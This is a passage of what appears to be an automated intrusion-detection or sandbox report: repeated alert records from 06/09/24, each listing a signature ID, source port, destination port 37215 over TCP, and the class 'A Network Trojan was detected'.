          Timestamp:06/09/24-16:33:40.822907
          SID:2835222
          Source Port:33254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397482
          SID:2829579
          Source Port:60504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945197
          SID:2835222
          Source Port:36352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919051
          SID:2835222
          Source Port:43034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719547
          SID:2835222
          Source Port:56436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914740
          SID:2835222
          Source Port:39432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078793
          SID:2829579
          Source Port:37954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242679
          SID:2829579
          Source Port:55126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719403
          SID:2829579
          Source Port:45076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716928
          SID:2835222
          Source Port:46242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.941941
          SID:2835222
          Source Port:35834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465402
          SID:2835222
          Source Port:51342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036211
          SID:2829579
          Source Port:56332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926165
          SID:2829579
          Source Port:55112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286950
          SID:2835222
          Source Port:33134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538921
          SID:2835222
          Source Port:37256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396326
          SID:2829579
          Source Port:45266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248763
          SID:2835222
          Source Port:35614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288524
          SID:2835222
          Source Port:33454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562019
          SID:2835222
          Source Port:53530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720930
          SID:2829579
          Source Port:49422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539000
          SID:2835222
          Source Port:60070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819875
          SID:2835222
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564954
          SID:2829579
          Source Port:50876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667686
          SID:2835222
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030869
          SID:2829579
          Source Port:60772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920164
          SID:2835222
          Source Port:40692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644859
          SID:2835222
          Source Port:42816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225606
          SID:2835222
          Source Port:57918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032684
          SID:2835222
          Source Port:57386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038591
          SID:2835222
          Source Port:40586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164502
          SID:2835222
          Source Port:41306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167637
          SID:2835222
          Source Port:56614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205706
          SID:2829579
          Source Port:37008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222736
          SID:2835222
          Source Port:48812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718207
          SID:2835222
          Source Port:41222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132013
          SID:2835222
          Source Port:46886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289444
          SID:2829579
          Source Port:53830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538571
          SID:2835222
          Source Port:55254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713613
          SID:2829579
          Source Port:38384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905994
          SID:2829579
          Source Port:39116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920063
          SID:2835222
          Source Port:54508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289752
          SID:2829579
          Source Port:38150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537867
          SID:2835222
          Source Port:33346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030317
          SID:2829579
          Source Port:55824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290537
          SID:2829579
          Source Port:43486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076373
          SID:2829579
          Source Port:48616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268440
          SID:2835222
          Source Port:54444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294483
          SID:2829579
          Source Port:33872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713696
          SID:2835222
          Source Port:53400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914212
          SID:2829579
          Source Port:56212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593764
          SID:2829579
          Source Port:52314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032646
          SID:2829579
          Source Port:55010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721022
          SID:2829579
          Source Port:42898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719935
          SID:2835222
          Source Port:58792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230248
          SID:2835222
          Source Port:51628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929949
          SID:2835222
          Source Port:33948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035456
          SID:2829579
          Source Port:46578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719013
          SID:2829579
          Source Port:56358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088679
          SID:2835222
          Source Port:55544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.901966
          SID:2829579
          Source Port:36082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302579
          SID:2829579
          Source Port:35132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288720
          SID:2829579
          Source Port:53344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994371
          SID:2829579
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244190
          SID:2829579
          Source Port:47928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033911
          SID:2835222
          Source Port:50432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039623
          SID:2835222
          Source Port:57298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102540
          SID:2829579
          Source Port:57668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718019
          SID:2829579
          Source Port:46512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085518
          SID:2835222
          Source Port:50948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464751
          SID:2835222
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890485
          SID:2835222
          Source Port:58654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861925
          SID:2835222
          Source Port:56280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397286
          SID:2829579
          Source Port:39322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867264
          SID:2829579
          Source Port:37172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287222
          SID:2829579
          Source Port:48458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660856
          SID:2835222
          Source Port:55626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863726
          SID:2829579
          Source Port:44380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604228
          SID:2835222
          Source Port:57974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721705
          SID:2835222
          Source Port:58870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946619
          SID:2829579
          Source Port:49292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.899276
          SID:2835222
          Source Port:53092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989661
          SID:2835222
          Source Port:38204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717869
          SID:2829579
          Source Port:45604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035376
          SID:2835222
          Source Port:56722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230808
          SID:2835222
          Source Port:54002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067332
          SID:2829579
          Source Port:48706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164798
          SID:2835222
          Source Port:49956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073809
          SID:2835222
          Source Port:50764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602544
          SID:2829579
          Source Port:43930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601913
          SID:2829579
          Source Port:57604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246601
          SID:2835222
          Source Port:55902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644123
          SID:2835222
          Source Port:60092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668635
          SID:2835222
          Source Port:50952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157395
          SID:2829579
          Source Port:56664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.995391
          SID:2829579
          Source Port:41692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289122
          SID:2835222
          Source Port:34838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205655
          SID:2829579
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.148151
          SID:2829579
          Source Port:39340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950983
          SID:2835222
          Source Port:44626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915085
          SID:2835222
          Source Port:47398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205850
          SID:2835222
          Source Port:39086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396610
          SID:2835222
          Source Port:51694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721604
          SID:2829579
          Source Port:58892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249491
          SID:2835222
          Source Port:45346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818045
          SID:2829579
          Source Port:43446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822070
          SID:2829579
          Source Port:52542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985275
          SID:2829579
          Source Port:59426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.091777
          SID:2829579
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944145
          SID:2835222
          Source Port:55078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000413
          SID:2829579
          Source Port:51004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395988
          SID:2835222
          Source Port:48008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917781
          SID:2829579
          Source Port:37680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417473
          SID:2835222
          Source Port:43964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916032
          SID:2829579
          Source Port:40376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208062
          SID:2835222
          Source Port:42954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862785
          SID:2835222
          Source Port:35788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168045
          SID:2829579
          Source Port:37596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283493
          SID:2835222
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.953591
          SID:2829579
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414288
          SID:2829579
          Source Port:39788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947248
          SID:2835222
          Source Port:33584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075702
          SID:2835222
          Source Port:35992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643946
          SID:2829579
          Source Port:45608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074503
          SID:2835222
          Source Port:57492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160382
          SID:2829579
          Source Port:48914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275781
          SID:2835222
          Source Port:33566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285441
          SID:2829579
          Source Port:44308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947305
          SID:2835222
          Source Port:40104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946517
          SID:2829579
          Source Port:59132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644782
          SID:2835222
          Source Port:46580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950202
          SID:2835222
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012712
          SID:2835222
          Source Port:37016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558394
          SID:2829579
          Source Port:40494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248846
          SID:2829579
          Source Port:60216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900302
          SID:2829579
          Source Port:43280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037578
          SID:2835222
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299121
          SID:2829579
          Source Port:57870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284918
          SID:2835222
          Source Port:45968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720905
          SID:2829579
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472319
          SID:2829579
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596098
          SID:2829579
          Source Port:57572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225789
          SID:2835222
          Source Port:55098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917960
          SID:2829579
          Source Port:35216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290204
          SID:2835222
          Source Port:35284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038205
          SID:2835222
          Source Port:56256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490228
          SID:2835222
          Source Port:46636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104006
          SID:2829579
          Source Port:43048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594162
          SID:2829579
          Source Port:58116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603663
          SID:2829579
          Source Port:59334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120646
          SID:2829579
          Source Port:42044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289811
          SID:2835222
          Source Port:59264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944252
          SID:2829579
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718895
          SID:2835222
          Source Port:56454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286670
          SID:2835222
          Source Port:33592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284190
          SID:2835222
          Source Port:55616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253303
          SID:2829579
          Source Port:37782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.906013
          SID:2829579
          Source Port:40236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645825
          SID:2829579
          Source Port:39128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227696
          SID:2835222
          Source Port:35274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250929
          SID:2829579
          Source Port:40716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104096
          SID:2829579
          Source Port:47336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078646
          SID:2835222
          Source Port:49406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866176
          SID:2829579
          Source Port:40768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029823
          SID:2835222
          Source Port:39094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105373
          SID:2829579
          Source Port:35882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869956
          SID:2835222
          Source Port:56266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931395
          SID:2835222
          Source Port:52090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603724
          SID:2829579
          Source Port:49056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864579
          SID:2835222
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037538
          SID:2829579
          Source Port:44608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947277
          SID:2835222
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286360
          SID:2835222
          Source Port:52650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223267
          SID:2835222
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206855
          SID:2829579
          Source Port:58398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594009
          SID:2835222
          Source Port:48870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039640
          SID:2829579
          Source Port:50486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945078
          SID:2829579
          Source Port:59942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916854
          SID:2835222
          Source Port:42864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820910
          SID:2829579
          Source Port:38850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645982
          SID:2829579
          Source Port:36000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285426
          SID:2829579
          Source Port:50018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162714
          SID:2829579
          Source Port:47622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286983
          SID:2829579
          Source Port:37366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027246
          SID:2835222
          Source Port:46536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206206
          SID:2835222
          Source Port:47228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.641388
          SID:2835222
          Source Port:58148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104804
          SID:2829579
          Source Port:59346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557430
          SID:2835222
          Source Port:49638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930173
          SID:2829579
          Source Port:53882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558239
          SID:2835222
          Source Port:33890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646224
          SID:2829579
          Source Port:50958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567497
          SID:2835222
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948478
          SID:2835222
          Source Port:42908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034168
          SID:2829579
          Source Port:40738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287013
          SID:2829579
          Source Port:42458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595897
          SID:2835222
          Source Port:35186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691815
